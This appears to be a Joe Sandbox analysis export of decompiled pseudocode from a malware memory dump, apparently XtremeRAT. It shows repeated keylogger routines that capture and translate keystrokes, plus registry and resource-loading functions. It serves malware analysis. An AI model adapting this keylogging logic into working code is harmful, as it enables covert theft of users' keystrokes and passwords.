Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Tab], xrefs: 00C85A18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DE6, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboard

C-Code - Quality: 80%

			E00C85DE6(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85de6
0x00c85ded
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Volume Up], xrefs: 00C85DE8

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C888D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
registry

C-Code - Quality: 100%

			E00C888D0(void* __eax, short* __edx, int _a4, int _a8, char* _a16) {
				void* _v8;
				void* _t17;
				short* _t18;

				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8);
				if(RegSetValueExW(_v8, _t18, 0, _a4, _a16, _a8) == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c888d8
0x00c888e0
0x00c888ff
0x00c88901
0x00c88901
0x00c88907
0x00c88912

APIs

RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,?,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,?,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Strings

SOFTWARE\FakeMessage, xrefs: 00C888DE
FakeMessage, xrefs: 00C888D3, 00C888F3

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C89840, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
registry

C-Code - Quality: 100%

			E00C89840() {
				int _v8;
				int _v12;
				void* _v16;
				int _t13;

				_t13 = 0;
				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\FakeMessage", 0, 1,  &_v12) == 0) {
					if(RegQueryValueExW(_v16, L"FakeMessage", 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
						_t13 = 1;
					}
					RegCloseKey(_v16);
				}
				return _t13;
			}

0x00c89844
0x00c8985c
0x00c8987d
0x00c89886
0x00c89886
0x00c8988c
0x00c8988c
0x00c89897

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Strings

FakeMessage, xrefs: 00C8986C
SOFTWARE\FakeMessage, xrefs: 00C8984B

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83FDC, Relevance: 7.5, APIs: 5, Instructions: 37

C-Code - Quality: 100%

			E00C83FDC(WCHAR* __eax, void* __edx) {
				WCHAR* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t7;
				void* _t9;
				struct HRSRC__* _t13;
				void* _t14;
				void* _t19;

				_t2 = __eax;
				_t19 = __edx;
				if(__eax == 0) {
					_t2 =  *0xc8b0b0; // 0xc83fcc
				}
				_t3 =  *0xc8c670; // 0xc80000
				_t13 = FindResourceW(_t3, _t2, 0xa);
				_t5 =  *0xc8c670; // 0xc80000
				SizeofResource(_t5, _t13);
				_t7 =  *0xc8c670; // 0xc80000
				_t14 = LoadResource(_t7, _t13);
				_t9 = LockResource(_t14);
				if(_t9 != 0) {
					E00C82914(_t19, _t9);
					return FreeResource(_t14);
				}
				return _t9;
			}

0x00c83fdc
0x00c83fdf
0x00c83fe3
0x00c83fe5
0x00c83fe5
0x00c83fed
0x00c83ff8
0x00c83ffb
0x00c84001
0x00c84009
0x00c84014
0x00c84017
0x00c8401e
0x00c84025
0x00000000
0x00c8402b
0x00c84033

APIs

FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85928(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85928
0x00c8592f
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858D3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858D3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86098);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858d3
0x00c858da
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85906, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85906(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85906
0x00c8590d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C859F4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859F4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc861a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
